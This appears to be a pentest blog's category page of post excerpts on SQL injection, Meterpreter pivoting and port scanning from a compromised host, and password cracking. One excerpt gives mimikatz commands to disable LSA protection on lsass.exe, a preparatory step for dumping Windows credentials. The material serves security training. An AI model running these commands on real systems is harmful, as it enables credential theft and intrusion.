Links for various tools and resources.
Category: Pentest
SQL Injection Methodology
An overview of black-box and white-box SQLi methodologies.
SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Protected: Black Box Pen Test 1
There is no excerpt because this is a protected post.
Meterpreter
Links: Proxy and Route
Protected: Black Box Pen Test 3
There is no excerpt because this is a protected post.
Mimikatz
LSA Protection Bypass
Check if LSA runs as a protected process. The "RunAsPPL" value will be set to 0x1 in HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then import.
mimikatz # !+
Remove the protection flags from the lsass.exe process.
mimikatz # !processprotect /process:lsass.exe /remove
Password Cracking Demo
This is a recording based on a presentation I gave at the 2019 Cerdant Security Conference in Dublin, OH. Included in this presentation: Core Hash Cracking Knowledge, Overview of Cracking Methodology, Live Password Crack (Mask Attack), Pen Test Demonstration (DVWA & SQLMap).
https://www.youtube.com/watch?v=3sk0q8WK2Ek&t=17s
Protected: Lab – Post Exploitation
There is no excerpt because this is a protected post.
Meterpreter Remote Port Scan
Performing a remote network scan via a meterpreter session.
Check IP configuration of compromised host:
meterpreter > ifconfig
Interface 2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:50:56:87:a6:9c
MTU          : 1500
IPv4 Address : 10.32.120.15
IPv4 Netmask : 255.255.255.0
ARP scan of remote subnet. Using -r to set …